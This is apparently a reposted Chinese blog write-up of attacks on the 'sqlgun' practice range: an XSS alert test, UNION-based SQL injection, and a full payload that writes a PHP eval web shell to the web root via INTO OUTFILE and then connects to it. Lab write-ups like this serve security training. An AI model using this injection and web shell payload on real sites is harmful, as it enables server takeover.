当前位置: 首页 > news >正文

sqlgun靶场漏洞挖掘

进入首页首先看到一个搜索框,那么我们试一下xss

用script弹了个一

接下来我们尝试一下sql注入

这里我们使用联合查询查到了他的数据库名,那么这里也就存在SQL注入了

这里存在SQL注入那么我们就尝试一下是否可以注入木马来getshell

首先我们扫描目录,找到phpinfo页面

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/yynzj.php' #

然后去访问

进行连接

成功getshell


http://www.mrgr.cn/news/26345.html

相关文章:

  • 一个简单的点歌系统
  • 环境变量和本地变量
  • Vector - VT System - 板卡_VT板卡使用介绍_01
  • 静态库的制作
  • JavaSE:3、运算符
  • linux-L5.linux查看应用占用的资源top
  • 链表中每k个一组进行反转
  • STL详解 - vector
  • 计算机网络:概述 - 性能指标
  • 今天一定要彻底卸载Windows Denfender!攻略给你了
  • 代码随想录Day 43|leetcode题目:300.最长递增子序列、674. 最长连续递增序列、718. 最长重复子数组
  • 【zabbix监控软件(配置及常用键值)】
  • Qt常用控件——QTextEdit
  • 心觉:收钱就像喝水一样简单,是如何做到的?
  • lvs命令介绍
  • 尤雨溪推荐的拖拽插件,支持Vue2/Vue3 VueDraggablePlus
  • 【LeetCode】每日一题 2024_9_13 预算内的最多机器人数目(滑动窗口、单调队列)
  • 论文速递! Attention-LSTM特征融合,用于剩余使用寿命(RUL)预测
  • 会计信息化:从核算软件到智能系统
  • 力扣3014.输入单词需要的最少按键次数I